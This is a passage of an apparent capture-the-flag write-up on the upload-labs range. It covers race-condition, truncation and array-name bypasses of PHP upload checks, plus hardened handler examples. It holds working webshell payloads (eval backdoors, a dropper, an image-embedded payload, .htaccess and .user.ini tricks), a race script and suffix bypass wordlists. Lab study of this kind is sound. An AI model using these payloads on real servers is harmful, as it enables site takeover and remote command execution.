class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="string">"SUCCESS"</span> );</span><br><span class="line"> </span><br><span class="line"> }</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>The source seems to have a small bug~<br>In the myupload.php file under the Pass19 directory,</p>
<p>change line 103 from</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">$this->cls_upload_dir = $dir;</span><br></pre></td></tr></table></figure>
<p>to:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">$this->cls_upload_dir = $dir.'/';</span><br></pre></td></tr></table></figure>
<p>Without the change, the upload ends up like this: <code>../upload11111111.jpg</code></p>
<p>We will leave it unchanged here and go straight to it.</p>
<p>Reading the source shows that the file is saved first and renamed afterwards, so a race condition exists here as well. This level does check the file extension against a whitelist and then checks the file size, whether the file already exists, and so on, one step at a time, so by uploading the image webshell repeatedly, the race may leave no time for the rename and the upload succeeds.</p>
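As an added illustration (this is not the lab's MyUpload class), the reduced ordering below shows where the window is and how a handler removes it by deciding the final single-extension name before its only move_uploaded_file() call. The whitelist, the naming scheme and the directory are assumptions of this example.

```php
<?php
// Added example, not upload-labs code. Reduced Pass-19 ordering versus a
// handler that never writes the file under the client-supplied name.
declare(strict_types=1);

// Constructed whitelist: MIME type reported by getimagesize() -> stored extension.
const IMAGE_EXT = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

/**
 * Reduction of the lab's flow: move first, rename second. Between the two
 * calls "<dir>/pass20.php.7z" is reachable through the web server, and a
 * request that lands in that window is served before the rename happens.
 */
function move_then_rename(string $tmp, string $client_name, string $dir): string
{
    $first = $dir . DIRECTORY_SEPARATOR . basename($client_name);   // e.g. pass20.php.7z
    move_uploaded_file($tmp, $first);                               // window opens
    $second = $dir . DIRECTORY_SEPARATOR . time() . strrchr($client_name, '.');
    rename($first, $second);                                        // window closes
    return $second;
}

/**
 * Hardened handler. Returns the stored path or null. The rename step is gone:
 * the final name is computed before the single move_uploaded_file() call, and
 * that name is a random token plus exactly one whitelisted image extension,
 * so neither the original name nor a double extension ever reaches disk.
 */
function store_upload(array $file, string $dir): ?string
{
    // 1. Only a file PHP itself received through this request is acceptable.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        return null;
    }

    // 2. Take the extension from the content, not from $_FILES['name'].
    //    (An image that also carries PHP text still passes this check, which
    //    is why the random single-extension name and the server mapping matter.)
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset(IMAGE_EXT[$info['mime']])) {
        return null;
    }
    $ext = IMAGE_EXT[$info['mime']];

    // 3. Decide the final name BEFORE writing anything.
    $final = $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
    if (file_exists($final)) {
        return null; // practically impossible; fail closed rather than overwrite
    }

    // 4. One move, straight from PHP's temp dir to the final path. There is no
    //    intermediate name to race against and nothing left to rename.
    if (!move_uploaded_file($file['tmp_name'], $final)) {
        return null;
    }
    return $final;
}

// Usage in the request handler (directory is a constructed example path):
// $stored = store_upload($_FILES['upload_file'], '/var/www/uploads');
// Pair this with web-server configuration that serves the upload directory
// as static content only, so a stored file is never handed to a script engine.
```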
<p>Create pass20.php.7z with the following content</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?</span>PHP <span class="keyword">echo</span> <span class="string">"1"</span>;<span class="title function_ invoke__">fputs</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'<?php @eval($_POST[cmd])?>'</span>);<span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>Start the attack in Burp</p>
<p>Keep requesting from the browser</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">http://192.168.20.134/uploadpass20.php.7z</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726125226559.png" alt="image-20200726125226559"></p>
<p>Once the digit 1 is returned, Burp can be paused.</p>
<p>Then connect with Caidao (China Chopper)</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726125401502.png" alt="image-20200726125401502"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726125435476.png" alt="image-20200726125435476"></p>
<h2 id="Pass-20-截断"><a href="#Pass-20-截断" class="headerlink" title="Pass-20-截断"></a>Pass-20-Truncation</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">"php"</span>,<span class="string">"php5"</span>,<span class="string">"php4"</span>,<span class="string">"php3"</span>,<span class="string">"php2"</span>,<span class="string">"html"</span>,<span class="string">"htm"</span>,<span class="string">"phtml"</span>,<span class="string">"pht"</span>,<span class="string">"jsp"</span>,<span class="string">"jspa"</span>,<span class="string">"jspx"</span>,<span class="string">"jsw"</span>,<span class="string">"jsv"</span>,<span class="string">"jspf"</span>,<span class="string">"jtml"</span>,<span class="string">"asp"</span>,<span class="string">"aspx"</span>,<span class="string">"asa"</span>,<span class="string">"asax"</span>,<span class="string">"ascx"</span>,<span class="string">"ashx"</span>,<span class="string">"asmx"</span>,<span class="string">"cer"</span>,<span class="string">"swf"</span>,<span class="string">"htaccess"</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$file_name</span> = <span class="variable">$_POST</span>[<span class="string">'save_name'</span>];</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ 
invoke__">pathinfo</span>(<span class="variable">$file_name</span>,PATHINFO_EXTENSION);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>,<span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span> .<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) { </span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'禁止保存为该类型文件!'</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>The POST parameter <code>save_name</code> is controllable: with the input upload-19.php%00.jpg, the <code>$file_ext</code> obtained by pathinfo is .jpg, so execution enters the if block.<br>So this Pass again relies on 00 truncation, but because our PHP version is too new, the 00-truncation upload cannot work</p>
<p>However, this Pass can also be bypassed with /.</p>
<p>Append <code>/.</code> to the php suffix in the filename<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582870142-763322-upload-labs20-2.png" alt="img"></p>
<p>Access the file:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582870184-722834-upload-labs20-3.png" alt="img"></p>
<h2 id="Pass-21-截断2"><a href="#Pass-21-截断2" class="headerlink" title="Pass-21-截断2"></a>Pass-21-Truncation 2</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>])){</span><br><span class="line"> <span class="comment">//check MIME</span></span><br><span class="line"> <span class="variable">$allow_type</span> = <span class="keyword">array</span>(<span class="string">'image/jpeg'</span>,<span class="string">'image/png'</span>,<span class="string">'image/gif'</span>);</span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>],<span class="variable">$allow_type</span>)){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"禁止上传该类型文件!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//check file name</span></span><br><span class="line"> <span class="variable">$file</span> = <span class="keyword">empty</span>(<span class="variable">$_POST</span>[<span class="string">'save_name'</span>]) ? 
<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>] : <span class="variable">$_POST</span>[<span class="string">'save_name'</span>];</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">is_array</span>(<span class="variable">$file</span>)) {</span><br><span class="line"> <span class="variable">$file</span> = <span class="title function_ invoke__">explode</span>(<span class="string">'.'</span>, <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file</span>));</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ext</span> = <span class="title function_ invoke__">end</span>(<span class="variable">$file</span>);</span><br><span class="line"> <span class="variable">$allow_suffix</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$ext</span>, <span class="variable">$allow_suffix</span>)) {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"禁止上传该后缀文件!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">reset</span>(<span class="variable">$file</span>) . <span class="string">'.'</span> . 
<span class="variable">$file</span>[<span class="title function_ invoke__">count</span>(<span class="variable">$file</span>) - <span class="number">1</span>];</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span> .<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件上传成功!"</span>;</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件上传失败!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"请选择要上传的文件!"</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>MIME is checked first; changing Content-Type: image/jpeg bypasses the first layer.<br>If what is uploaded is an array, <code>$file = explode('.', strtolower($file))</code> is skipped, while the final filename suffix is taken from <code>$file[count($file) - 1]</code>, so we can make <code>$file</code> an array.<br>With <code>$file[0]=test.php/</code> and <code>$file[2]=jpg</code>, the bypass succeeds because <code>move_uploaded_file</code> ignores <code>/.</code></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726131959679.png" alt="image-20200726131959679"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582871955-446314-upload-labs21-2.png" alt="img"><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582872061-998930-upload-labs21-3.png" alt="img"></p>
<p>Note that this level cannot be uploaded to repeatedly; it will error.</p>
<h2 id="技巧"><a href="#技巧" class="headerlink" title="技巧"></a>Tips</h2><p>When the source is unknown, how do we determine which file suffixes can be uploaded?<br>We can use Burp Suite to submit suffixes in bulk and see which ones are accepted.<br>First capture any request and send it to Intruder:</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726013341422.png" alt="image-20200726013341422"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726013534794.png" alt="image-20200726013534794"></p>
<p>Then add the following payloads and start the attack</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">php</span><br><span class="line">php </span><br><span class="line">php.</span><br><span class="line">php::$DATA</span><br><span class="line">php. .</span><br><span class="line">php\.</span><br><span class="line">pphph</span><br><span class="line">php7</span><br><span class="line">php5</span><br><span class="line">php4</span><br><span class="line">php3</span><br><span class="line">php2</span><br><span class="line">php1</span><br><span class="line">html</span><br><span class="line">htm</span><br><span class="line">phtml</span><br><span class="line">pHp</span><br><span class="line">Php</span><br><span class="line">phP</span><br><span class="line">pHp5</span><br><span class="line">pHp4</span><br><span class="line">pHp3</span><br><span class="line">pHp2</span><br><span class="line">pHp1</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726013627718.png" alt="image-20200726013627718"></p>
<p>As you can see, every request except those with a response length of 3823 uploaded successfully, which reveals which suffixes can be uploaded</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726013817029.png" alt="image-20200726013817029"></p>
<p>Other dictionaries:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Html</span><br><span class="line">jsp</span><br><span class="line">jspa</span><br><span class="line">jspx</span><br><span class="line">jsw</span><br><span class="line">jsv</span><br><span class="line">jspf</span><br><span class="line">jtml</span><br><span class="line">jSp</span><br><span class="line">jSpx</span><br><span class="line">jSpa</span><br><span class="line">jSw</span><br><span class="line">jSv</span><br><span class="line">jSpf</span><br><span class="line">jHtml</span><br><span class="line">asp</span><br><span class="line">aspx</span><br></pre></td></tr></table></figure>
<p>Windows automatically strips a trailing period (.), spaces, ::$DATA and ". ." from file names.</p>
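A validator for a user-supplied save name, added here as an example rather than the lab's code, that closes the Pass-20 and Pass-21 paths and also refuses the suffix variants from the list above: the value must be one string of the form token.ext with a whitelisted extension, and the extension is read from the same string that forms the path. The whitelist and the vectors are constructed; it assumes PHP 8.

```php
<?php
// Added example, not upload-labs code. Strict handling of a user-supplied
// save name; the whitelist and the vectors below are constructed.
declare(strict_types=1);

const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

/**
 * Returns the sanitised name, or null when the input must be refused.
 * One check does all the work: the name must be a single string of the form
 * <token>.<ext>. That rules out arrays (Pass-21 skipped explode() for them
 * instead of rejecting them), NUL bytes and "/." (Pass-20), path separators,
 * a second ".", and the Windows-normalised variants ("php.", "php ",
 * "php::$DATA", "php. .") before the filesystem ever sees the name.
 */
function safe_save_name(mixed $save_name): ?string
{
    if (!is_string($save_name)) {
        return null;                           // save_name[]=... arrives as an array
    }
    if (!preg_match('/\A([A-Za-z0-9_-]{1,64})\.([A-Za-z0-9]{1,5})\z/', $save_name, $m)) {
        return null;                           // anything but token.ext
    }
    $ext = strtolower($m[2]);
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;                           // whitelist, not a deny list
    }
    // The extension used for the decision is the one that ends up on disk:
    // pathinfo(), explode()/end() and move_uploaded_file() cannot disagree.
    return $m[1] . '.' . $ext;
}

/** Joins the name onto the upload directory and proves it stayed there. */
function destination_path(string $upload_dir, string $safe_name): ?string
{
    $base = realpath($upload_dir);
    if ($base === false) {
        return null;
    }
    $dest = $base . DIRECTORY_SEPARATOR . $safe_name;
    return dirname($dest) === $base ? $dest : null;
}

// Vectors taken from the write-up (Pass-20, Pass-21 and the suffix list), constructed here.
$vectors = [
    ['upload-20.php%00.jpg',    null],          // literal "%00" is outside the charset
    ["upload-20.php\0.jpg",     null],          // decoded NUL byte
    ['upload-20.php/.',         null],          // the "/." trick
    [['test.php/', 2 => 'jpg'], null],          // Pass-21 array form
    ['shell.php.',              null],          // trailing dot
    ['shell.php::$DATA',        null],          // NTFS stream suffix
    ['shell.pHp5',              null],          // case variant, not whitelisted
    ['pic.php.jpg',             null],          // double extension
    ['avatar.JPG',              'avatar.jpg'],  // accepted and normalised
];

foreach ($vectors as [$input, $expected]) {
    $got = safe_save_name($input);
    $label = is_array($input) ? 'array(' . implode(',', $input) . ')' : addcslashes($input, "\0");
    printf("%-34s -> %s %s\n", $label, var_export($got, true), $got === $expected ? 'ok' : 'MISMATCH');
}
```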
<h2 id="常用文件"><a href="#常用文件" class="headerlink" title="常用文件"></a>Common files</h2><p>php</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> <span class="title function_ invoke__">phpinfo</span>();<span class="meta">?></span></span><br><span class="line"></span><br><span class="line"><span class="meta"><?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="number">123123</span>])<span class="meta">?></span> </span><br><span class="line"></span><br><span class="line"><span class="meta"><?</span>PHP <span class="keyword">echo</span> <span class="string">"1"</span>;<span class="title function_ invoke__">fputs</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'<?php @eval($_POST[cmd])?>'</span>);<span class="meta">?></span></span><br><span class="line"></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="comment">//png.php</span></span><br><span class="line"> <span class="variable">$p</span> = <span class="keyword">array</span>(<span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xf7</span>, <span class="number">0xe</span>, <span class="number">0x93</span>, <span class="number">0x1b</span>, <span class="number">0x23</span>, <span class="number">0xbe</span>, <span class="number">0x2c</span>, <span class="number">0x8a</span>, <span class="number">0xd0</span>, <span class="number">0x80</span>, <span class="number">0xf9</span>, <span class="number">0xe1</span>, <span class="number">0xae</span>, <span class="number">0x22</span>, <span class="number">0xf6</span>, <span class="number">0xd9</span>, <span class="number">0x43</span>, <span class="number">0x5d</span>, <span class="number">0xfb</span>, <span class="number">0xae</span>, <span class="number">0xcc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span 
class="number">0xdc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span class="number">0xdc</span>, <span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xa5</span>, <span class="number">0xbe</span>, <span class="number">0x5f</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5a</span>, <span class="number">0x4c</span>, <span class="number">0xa1</span>, <span class="number">0x3f</span>, <span class="number">0x7a</span>, <span class="number">0xbf</span>, <span class="number">0x30</span>, <span class="number">0x6b</span>, <span class="number">0x88</span>, <span class="number">0x2d</span>, <span class="number">0x60</span>, <span class="number">0x65</span>, <span class="number">0x7d</span>, <span class="number">0x52</span>, <span class="number">0x9d</span>, <span class="number">0xad</span>, <span class="number">0x88</span>, <span class="number">0xa1</span>, <span class="number">0x66</span>, <span class="number">0x44</span>, <span class="number">0x50</span>, <span class="number">0x33</span>);</span><br><span class="line"> <span class="variable">$img</span> = <span class="title function_ invoke__">imagecreatetruecolor</span>(<span class="number">32</span>, <span class="number">32</span>);</span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$y</span> = <span class="number">0</span>; <span class="variable">$y</span> < <span class="title function_ invoke__">sizeof</span>(<span class="variable">$p</span>); <span class="variable">$y</span> += <span class="number">3</span>) {</span><br><span class="line"> <span class="variable">$r</span> = <span class="variable">$p</span>[<span class="variable">$y</span>];</span><br><span class="line"> <span class="variable">$g</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">1</span>];</span><br><span class="line"> 
<span class="variable">$b</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">2</span>];</span><br><span class="line"> <span class="variable">$color</span> = <span class="title function_ invoke__">imagecolorallocate</span>(<span class="variable">$img</span>, <span class="variable">$r</span>, <span class="variable">$g</span>, <span class="variable">$b</span>);</span><br><span class="line"> <span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>), <span class="number">0</span>, <span class="variable">$color</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="title function_ invoke__">imagepng</span>(<span class="variable">$img</span>,<span class="string">'./pass17.png'</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>.htaccess</p>
<figure class="highlight nginx"><table><tr><td class="code"><pre><span class="line"><span class="attribute">SetHandler</span> application/x-httpd-php</span><br></pre></td></tr></table></figure>
<p>.user.ini</p>
<figure class="highlight ini"><table><tr><td class="code"><pre><span class="line"><span class="attr">auto_prepend_file</span>=pass5.png</span><br></pre></td></tr></table></figure>
<p>gif</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">GIF89a</span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">phpinfo</span>();</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>python</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    <span class="comment"># request the page repeatedly until the marker "1" appears in the response</span></span><br><span class="line">    i=<span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="built_in">print</span>(i,end=<span class="string">'\r'</span>)</span><br><span class="line">            a = requests.get(<span class="string">"http://192.168.20.134:80/upload/pass18.php"</span>)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">"1"</span> <span class="keyword">in</span> a.text:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">"OK"</span>)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            <span class="keyword">pass</span></span><br><span class="line">        i+=<span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>CTF</category>